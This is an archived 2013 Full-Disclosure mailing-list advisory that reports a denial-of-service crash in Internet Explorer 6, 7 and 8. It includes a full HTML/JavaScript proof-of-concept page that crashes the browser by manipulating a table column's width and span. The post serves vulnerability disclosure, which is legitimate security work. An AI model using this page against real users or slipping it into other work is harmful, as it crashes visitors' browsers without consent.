lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <004201cee570$f5668e80$9b7a6fd5@pc>
Date: Tue, 19 Nov 2013 23:46:29 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: DoS vulnerability in Internet Explorer 6, 7,
	8 (access violation)

Hello list!

I want to warn you about Denial of Service vulnerability in Internet
Explorer. This is access violation.

This exploit is based on exploit by Asesino04 for IE7. As I've tested, it
also works in IE6 and IE8.

-------------------------
Affected products:
-------------------------

Vulnerable are Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7
(7.00.5730.13), Internet Explorer 8.0 (8.00.6001.18702) and previous
versions of these browsers. IE 9, 10 and 11 were not tested, but potentially
they can be vulnerable.

----------
Details:
----------

Denial of Service (WASC-10):

Browser crashes at access by id to element of web page via method
document.getElementById. At that in IE 6 and 7 the browser crashes, but in
IE8 the tab is automatically restarting after error message (this
functionality appeared in IE8).

PoC / Exploit:

<html>
<head>
<title>Internet Explorer 6, 7 & 8 DoS Exploit.
http://websecurity.com.ua</title>
<!-- Made by MustLive based on exploit by Asesino04 for IE7
(http://1337day.com/exploit/21290) -->
</head>
<body>
<table style="table-layout:fixed">
<col id="132" width="41" span="1">&nbsp;</col>
</table>
<script>
function over_trigger() {
var obj_col = document.getElementById("132");
obj_col.width = 42765;
obj_col.span = 1000;
}
setTimeout("over_trigger()",1);
</script>
</body>
</html>

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ